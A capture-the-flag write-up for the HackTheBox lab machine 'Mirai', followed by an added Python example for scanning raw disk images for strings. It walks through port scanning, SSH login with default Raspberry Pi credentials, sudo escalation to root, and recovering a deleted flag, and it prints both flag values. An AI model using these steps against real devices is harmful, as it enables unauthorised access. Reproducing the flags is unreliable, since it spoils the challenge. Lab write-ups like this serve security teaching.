HTB:Mirai[WriteUP]
Connect to the HTB server and start the target machine
Target IP: 10.10.10.48
Assigned IP: 10.10.14.12
1. What is the name of the service running on TCP port 53 on Mirai? Don't include a version number.
Use nmap to scan all TCP ports on the target for open ports
nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.48
Continue with nmap, running script and service-version scans against the open ports
nmap -p 22,53,80,1352,32400,32469 -sCV 10.10.10.48
The scan results show that port 53 on the target hosts the dnsmasq service
2. What unusual HTTP header is included in the response when visiting the service on port 80?
Use curl to fetch the response headers from port 80 on the target
curl -I 10.10.10.48:80
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I 10.10.10.48:80
HTTP/1.1 404 Not Found
X-Pi-hole: A black hole for Internet advertisements.
Content-type: text/html; charset=UTF-8
Date: Tue, 05 Nov 2024 00:39:57 GMT
Server: lighttpd/1.4.35
The response contains an unusual HTTP header: X-Pi-hole
3. What relative path on the webserver presents the Pi-hole dashboard?
Use ffuf to fuzz paths on port 80 of the target
ffuf -u http://10.10.10.48/FUZZ -w ../dictionary/common.txt
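Browsing to the /admin path opens the Pi-hole dashboard
4. What was the default username on a Raspberry Pi device?
Search online for Pi-hole related credentials
The default username for this device is: pi
5. What is the default password for the pi user?
The default password is: raspberry
Username: pi
Password: raspberry
6. Submit the flag located on the pi user's desktop.
Try logging in to the target's SSH service with these credentials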
ssh pi@10.10.10.48
Locate user_flag and view its contents
pi@raspberrypi:~ $ find / -name 'user.txt' 2>/dev/null
/home/pi/Desktop/user.txt
pi@raspberrypi:~ $ cat /home/pi/Desktop/user.txt
ff837707441b257a20e32199d7c8838d
USER_FLAG:ff837707441b257a20e32199d7c8838d
7. Can the pi user run any command as root on Mirai?
List the commands the current user may run with elevated privileges
sudo -l
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
The current user can run every command with root privileges (yes)
8. The flag-less root.txt file mentions that it's on the USB stick. What is the mountpoint for a device that is labeled as a USB stick on this host?
Switch directly to the root user
sudo su
Use the find command to locate root_flag
root@raspberrypi:/home/pi# find / -name 'root.txt'
/lib/live/mount/persistence/sda2/root/root.txt
/root/root.txt
Viewing both files shows that neither contains the flag
root@raspberrypi:/home/pi# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
root@raspberrypi:/home/pi# cat /lib/live/mount/persistence/sda2/root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
List all mount points
mount
List the mount points that contain the string usb
mount | grep usb
root@raspberrypi:/home/pi# mount | grep usb
/dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered)
9. What is the full path to the device that represents the raw USB media on Mirai?
mount | grep usb
root@raspberrypi:/home/pi# mount | grep usb
/dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered)
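10. When files are deleted from a drive, is the memory definitely immediately overwritten with something else?
General-knowledge question: after a file is deleted, its data is not (no) overwritten right away; the blocks it occupied are simply marked as available for new data
11. Submit the flag located on the USB device.
Use the strings command to inspect this file system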
strings /dev/sdb
root@raspberrypi:/home/pi# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
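The strings pass over the raw device in question 11 works because of the point made in question 10: the freed blocks still hold the old bytes. The following is an added example, not part of the original write-up, of the same scan done in Python with byte offsets reported; the image contents, the 32-hex-character filter and all function names are assumptions made for illustration.

```python
import io
import re

MIN_LEN = 4  # shortest run reported, the default strings(1) also uses
RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
HEX32 = re.compile(r"[0-9a-f]{32}")


def printable_runs(stream, chunk_size=1 << 20):
    """Yield (byte offset, text) for each printable-ASCII run in a raw image.

    Reads in chunks so a whole device never has to fit in memory; a run that
    touches the end of a chunk is carried over and finished on the next read.
    """
    carry, base = b"", 0  # base = absolute offset of carry[0]
    while True:
        chunk = stream.read(chunk_size)
        buf = carry + chunk
        cut = len(buf)
        while chunk and cut and 0x20 <= buf[cut - 1] <= 0x7E:
            cut -= 1  # hold back the unfinished printable tail
        for m in RUN.finditer(buf[:cut]):
            yield base + m.start(), m.group().decode("ascii")
        if not chunk:
            return
        carry, base = buf[cut:], base + cut


def hash_like_strings(stream, **kwargs):
    """Keep only runs that are exactly 32 lowercase hex characters."""
    return [(off, s) for off, s in printable_runs(stream, **kwargs)
            if HEX32.fullmatch(s)]


def constructed_image():
    """Constructed sample, not data from the target: directory-entry names
    followed by a data block that was freed but never overwritten."""
    pad = b"\x00" * 1024
    return (pad + b"lost+found\x00\x0croot.txt\x00\x0cdamnit.txt\x00" + pad
            + b"0123456789abcdef0123456789abcdef\n" + pad)


if __name__ == "__main__":
    for offset, value in hash_like_strings(io.BytesIO(constructed_image())):
        print(f"offset {offset}: {value}")
```

The reported offset tells an investigator which block of the device still holds the deleted content, which strings alone does not show unless run with -t.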